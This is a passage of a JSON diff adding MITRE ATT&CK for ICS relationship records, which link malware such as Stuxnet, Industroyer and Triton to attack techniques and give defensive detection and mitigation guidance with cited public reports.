"malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b07e6896-a840-49a1-8d58-94396a902b95", + "created": "2023-03-31T17:56:07.978Z", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T17:56:07.978Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) supplied the name of the payload DLL to [Industroyer](https://attack.mitre.org/software/S0604) via a command line parameter.(Citation: ESET Industroyer)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1d35c947-447f-4693-9ab0-32dff56e664e", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T20:19:47.429Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) enumerates and parses the System Data Blocks (SDB) using the s7blk_findfirst and s7blk_findnext API calls in s7otbxdx.dll. Stuxnet must find an SDB with the DWORD at offset 50h equal to 0100CB2Ch. This specifies that the system uses the Profibus communications processor module CP 342-5. In addition, specific values are searched for and counted: 7050h and 9500h. 7050h is assigned to part number KFC750V3 which appears to be a frequency converter drive (also known as variable frequency drive) manufactured by Fararo Paya in Teheran, Iran. 9500h is assigned to Vacon NX frequency converter drives manufactured by Vacon based in Finland.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)\n\n[Stuxnet](https://attack.mitre.org/software/S0603) was specifically targeting CPUs 6ES7-315-2 (Series 300) with special system data block characteristics for sequence A or B and 6ES7-315-2 for sequence C. The PLC type can also be checked using the s7ag_read_szl API.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--86ede365-4539-4475-b90b-9b3bfd2dbe97", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:18:43.413Z", + "description": "Monitor devices configuration logs which may contain alerts that indicate whether a program download has occurred. Devices may maintain application logs that indicate whether a full program download, online edit, or program append function has occurred.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d3ef0e3-560c-4e46-a0b4-dd1efc29e835", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:39:20.443Z", + "description": "Monitor for anomalies related to discovery related ICS functions, including devices that have not previously used these functions or for functions being sent to many outstations. Note that some ICS protocols use broadcast or multicast functionality, which may produce false positives. Also monitor for hosts enumerating network connected resources using non-ICS enterprise protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c0efb24a-2329-401a-bba6-817f2867bb3f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.183Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8c1b22bd-7e31-427f-a9c5-085a606212ca", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:59:36.071Z", + "description": "Monitor for unexpected deletion of files.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--aae5d42f-6bfc-44b6-8ff3-4b7abb4526ca", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:32:51.548Z", + "description": "Monitor for newly executed processes that may stop or disable services on a system to render those services unavailable to legitimate users.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e8d5ee60-952f-42ff-bf48-7da9cd0fdb23", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:46:16.720Z", + "description": "When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--798919d3-df8b-463f-b2be-4c1aa8089384", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.226Z", + "relationship_type": "mitigates", + "description": "Segment and control software movement between business and OT environments by way of one directional DMZs. Web access should be restricted from the OT environment. Engineering workstations, including transient cyber assets (TCAs) should have minimal connectivity to external networks, including Internet and email, further limit the extent to which these devices are dual-homed to multiple networks. (Citation: North America Transmission Forum December 2019)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "external_references": [ + { + "source_name": "North America Transmission Forum December 2019", + "description": "North America Transmission Forum 2019, December NATF Transient Cyber Asset Guidance Retrieved. 2020/09/25 ", + "url": "https://www.natf.net/docs/natf/documents/resources/security/natf-transient-cyber-asset-guidance.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5804ae3d-0daf-47a5-b026-d42878f55803", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--d72e7d01-56be-4fbd-8957-3384533ba83b", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:28:23.911Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) leverages a reconstructed TriStation protocol within its framework to trigger APIs related to program download, program allocation, and program changes. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b2defaaf-625d-416e-8a9d-8be6d89bacdc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.192Z", + "relationship_type": "mitigates", + "description": "ICS environments typically have more statically defined devices, therefore minimize the use of both IT discovery protocols (e.g., DHCP, LLDP) and discovery functions in automation protocols. (Citation: D. Parsons and D. Wylie September 2019) (Citation: Colin Gray) Examples of automation protocols with discovery capabilities include OPC UA Device Discovery (Citation: Josh Rinaldi April 2016), BACnet (Citation: Aditya K Sood July 2019), and Ethernet/IP. (Citation: Langner November 2018)\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "external_references": [ + { + "source_name": "D. Parsons and D. Wylie September 2019", + "description": "D. Parsons and D. Wylie 2019, September Practical Industrial Control System (ICS) Cybersecurity: IT and OT Have Converged Discover and Defend Your Assets Retrieved. 2020/09/25 ", + "url": "https://www.csiac.org/journal-article/practical-industrial-control-system-ics-cybersecurity-it-and-ot-have-converged-discover-and-defend-your-assets/" + }, + { + "source_name": "Colin Gray", + "description": "Colin Gray D. Parsons and D. Wylie 2019, September Practical Industrial Control System (ICS) Cybersecurity: IT and OT Have Converged Discover and Defend Your Assets Retrieved. 2020/09/25 How SDN Can Improve Cybersecurity in OT Networks Retrieved. 2020/09/25 ", + "url": "https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6891_HowSDN_CG_20180720_Web2.pdf?v=20190312-231901" + }, + { + "source_name": "Josh Rinaldi April 2016", + "description": "Josh Rinaldi 2016, April Still a Thrill: OPC UA Device Discovery Retrieved. 2020/09/25 ", + "url": "https://www.rtautomation.com/rtas-blog/still-a-thrill-opc-ua-device-discovery/" + }, + { + "source_name": "Aditya K Sood July 2019", + "description": "Aditya K Sood 2019, July Discovering and fingerprinting BACnet devices Retrieved. 2020/09/25 ", + "url": "https://www.helpnetsecurity.com/2019/07/10/bacnet-devices/" + }, + { + "source_name": "Langner November 2018", + "description": "Langner 2018, November Why Ethernet/IP changes the OT asset discovery game Retrieved. 2020/09/25 ", + "url": "https://www.langner.com/2018/11/why-ethernet-ip-changes-the-ot-asset-discovery-game/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--1d399f67-090e-444b-b75d-eed4b1780f08", + "created": "2022-09-26T18:42:16.844Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:42:16.844Z", + "description": "Monitor device application logs for firmware changes, although not all devices will produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--604a9bf0-81a3-425b-9005-779c4f0f749d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.195Z", + "relationship_type": "mitigates", + "description": "Harden the system through operating system controls to prevent the known or unknown use of malicious removable media.\n", + "source_ref": "course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f9625775-662c-425e-9ea0-6cb3f3bf5c3c", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:34:29.743Z", + "description": "Monitor for unexpected ICS protocol command functions to controllers from existing master devices (including from new processes) or from new devices. The latter is like detection for [Rogue Master](https://attack.mitre.org/techniques/T0848) but requires ICS function level insight to determine if an unauthorized device is issuing commands (e.g., a historian).\n\nMonitoring for unexpected or problematic values below the function level will provide better insights into potentially malicious activity but at the cost of additional false positives depending on the underlying operational process.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bff99f91-e1a9-4379-a2d9-5a99615a95d1", + "type": "relationship", + "created": "2020-09-22T19:41:27.951Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + } + ], + "modified": "2020-09-22T19:41:27.951Z", + "description": "(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "target_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--99ec0a8e-4a4f-427c-89db-163e4b206021", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.094Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system are compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c2484b15-7dd0-4280-8898-a6a7da6f0ca2", + "created": "2023-03-10T20:09:49.009Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:09:49.009Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--92ea1c2a-3835-43de-bb56-24e937a6f322", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:31:12.226Z", + "description": "Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (e.g., JScript.dll, vbscript.dll).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b4b698a7-b80e-41f6-8ca2-a954270cceb3", + "created": "2022-09-27T17:37:02.670Z", + "revoked": false, + "external_references": [ + { + "source_name": "Nzyme Alerts Intro", + "description": "Koopmann, Lennart. (n.d.). Nzyme Alerts Introduction. Retrieved September 26, 2022.", + "url": "https://www.nzyme.org/docs/alerts/intro" + }, + { + "source_name": "Wireless Intrusion Detection", + "description": "Tomko, A.; Rieser, C; Buell, H.; Zeret, D.; Turner, W.. (2007, March). Wireless Intrusion Detection. Retrieved September 26, 2022.", + "url": "https://apps.dtic.mil/sti/pdfs/ADA466332.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T17:37:02.670Z", + "description": "Purely passive network sniffing cannot be detected effectively. In cases where the adversary interacts with the wireless network (e.g., joining a Wi-Fi network) detection may be possible. Monitor for new or irregular network traffic flows which may indicate potentially unwanted devices or sessions on wireless networks. In Wi-Fi networks monitor for changes such as rogue access points or low signal strength, indicating a device is further away from the access point then expected and changes in the physical layer signal.(Citation: Nzyme Alerts Intro) (Citation: Wireless Intrusion Detection) Network traffic content will provide important context, such as hardware (e.g., MAC) addresses, user accounts, and types of messages sent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--754521fc-4306-4daa-831b-6b6fb45847e2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.108Z", + "relationship_type": "mitigates", + "description": "All APIs used to perform execution, especially those hosted on embedded controllers (e.g., PLCs), should provide adequate authorization enforcement of user access. Minimize user's access to only required API calls. (Citation: MITRE June 2020)\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "external_references": [ + { + "source_name": "MITRE June 2020", + "description": "MITRE 2020, June CWE CATEGORY: 7PK - API Abuse Retrieved. 2020/09/25 ", + "url": "https://cwe.mitre.org/data/definitions/227.html" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0a5d2136-e1f5-4a54-be64-a558f918bf0d", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:29:20.151Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9fb2a9b2-3b25-4f77-9f7a-e832b2e5071a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:54:30.385Z", + "description": "Using its protocol payloads, [Industroyer](https://attack.mitre.org/software/S0604) sends unauthorized commands to RTUs to change the state of equipment. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6c15ec9f-2b48-419c-adc1-f989833f6187", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.224Z", + "relationship_type": "mitigates", + "description": "Install anti-virus software on all workstation and transient assets that may have external access, such as to web, email, or remote file shares.\n", + "source_ref": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--730580d4-d68c-407f-9d09-f379e9aefc7e", + "created": 